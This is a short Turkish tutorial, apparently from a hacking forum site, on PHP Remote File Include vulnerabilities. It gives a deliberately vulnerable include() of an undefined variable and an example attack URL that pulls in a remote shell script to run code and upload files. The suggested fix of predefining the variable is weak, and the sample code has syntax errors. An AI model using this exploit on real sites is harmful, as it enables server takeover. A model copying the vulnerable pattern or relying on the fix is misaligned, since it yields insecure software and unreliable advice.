eger kendiniz bir script yazıyorsanız Remote File Include açıklarına dikkat etmeniz gereklidir.

$mehmetince gibi veriable'ları tanımlamalısınız.

bu değişkenleri;

include()
require()
include_once()
require_once()

ile kullandıgınızda eger önceden define edilmemişse sisteme uzaktan erişim sağlanacaktır.

mesela örne verelim; aşagıdaki kodları x.php olarak kaydedin

<?php
###########
#arkasokak.net#
###########

$mehmet = "ARKASOKAK NET"

echo $mehmet
<head>
<title>ARKASOKAK.NET</title>
</head>

?>

Şimdi aşagıdaki kodlarıda;a.php olarak kaydedin


<?php

###############
#arkasokak.net#
###############

include($arkasokak."x.php") ;

?>

Bu 2 dosyayı php destekleyen hostunuza attın
Daha sonra a.php ye girin, karşınıda ARKASOKAK NET yazısı gelecektir.

Şimdi a.php içine, x.php de olanları yazmak istedik.Bunun için include kullandım.
Ama $arkasokak değişkeni tanımlı olmadıgı için burda güvenlik açıgı bulunmaktadır.

a.php?arkasokak=http://shell-scripti?

bu şekilde siteye girmeye kalktık mı, uzaktan kod çalıştırırız ve serverda dosyta uploadı yapabiliriz.

bunu engellemek için örnek olarak a.php veya x.php ye

$arkasokak = "LAMERLER" ;

gibi bir kodla engelleyebiliriz.

BU DÖKÜMAN MEHMETİNCE YER AİTTİR.